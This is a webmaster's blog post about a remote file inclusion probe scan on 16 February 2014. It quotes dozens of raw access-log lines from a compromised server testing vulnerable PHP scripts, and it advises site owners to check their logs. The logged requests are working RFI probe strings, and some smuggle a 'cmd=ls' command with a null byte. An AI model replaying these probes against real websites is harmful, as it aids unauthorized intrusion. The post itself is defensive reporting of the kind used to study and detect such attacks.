Massive server probe attack on 2/16/2014
February 16, 2014
As a concerned web site owner and webmaster I make it a routine to review my daily access logs. I am not only looking at who visited me and from where they were referred, but who was attacking my web site and what probes they were using.
On Sunday, February 16, 2014, I was reading the day's raw access log when I saw an enormous vulnerability probe attack, which encompassed an amazing 2189 individual hack attempts over 12 minutes and 11 seconds. The entire attack came from a compromised dedicated server at 208.115.221.18, which belongs to Limestone Networks and is sub-leased to an Panamanian citizen, who in turn leased the server at that IP address to a company named Towntek.com.
Upon checking out Towntek.com I was greeted by a "default website page" that is displayed when web space has been leased, but no content has been uploaded to the public web root, and/ or no index page has been published.
So, what we have here is yet another undeveloped web site on an unsecured web server that has been hacked and is being used to attack other web sites.
Fortunately for me (fortune favors the prepared mind), I made it a point to learn about common attack vectors used to take over web sites and have protected my web sites against the tactics employed by the remote attacker using 208.115.221.18. This attack is most likely part of a botnet that employs hacked web sites and servers to launch attacks against other web sites and individuals browsing them.
I have since notified Limestone Networks about the compromised account. The assigned owner of the hacked site left no contact information.
Excerpts of the attack are shown in my extended content.
Excerpts of the server attack targeting Wizcrafts.net, on 2/16/2014:
208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /123flashchat.php?e107path=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /22_ultimate/templates/header.php?mainpath=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /=http://www.google.com/humans.txt? HTTP/1.1" 403 329 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /?_CONFIG[files][functions_page]=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /?npage=-1&content_dir=http://www.google.com/humans.txt?%00&cmd=ls HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /?npage=1&content_dir=http://www.google.com/humans.txt?%00&cmd=ls HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /?show=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /A-Blog/navigation/donation.php?navigation_start=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
snip
208.115.221.18 - - [16/Feb/2014:06:19:38 -0700] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:38 -0700] "GET /work/index.php?g_include=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:48 -0700] "GET /wp-cache-phase1.php?plugin=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:48 -0700] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:49 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:49 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:49 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:52 -0700] "GET /wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:52 -0700] "GET /wsk/wsk.php?wsk=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:52 -0700] "GET /xarg_corner.php?xarg=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /xarg_corner_bottom.php?xarg=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /xarg_corner_top.php?xarg=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.google.com/humans.txt?&2093085906=1&995617320=2 HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /xt_counter.php?server_base_dir=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /yabbse/Sources/Packages.php?sourcedir=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /yacs/scripts/update_trailer.php?context[path_to_root]=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /yrch/plugins/metasearch/plug.inc.php?path=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:57 -0700] "GET /ytb/cuenta/cuerpo.php?base_archivo=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:57 -0700] "GET /zipndownload.php?PP_PATH=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:57 -0700] "GET /zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
The attack lasted over 12 minutes and encompassed 2189 individual lines in my access log. The targets were probed in alphabetical order, ending with items beginning with the letter Z. Every one was tested to see if it could be used to include the remote file named "humans.txt." This type of attack is called an RFI attack.
If you own or manage web sites, check your access logs for similar entries. Mine all gave either a 403, 405, or 406 server response, which means they were fended off. If you see such hack attempts and any show a server 200 response, that means that the remote file inclusion was successful a you web server or web site may have been hacked.
If you like this article please share it.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.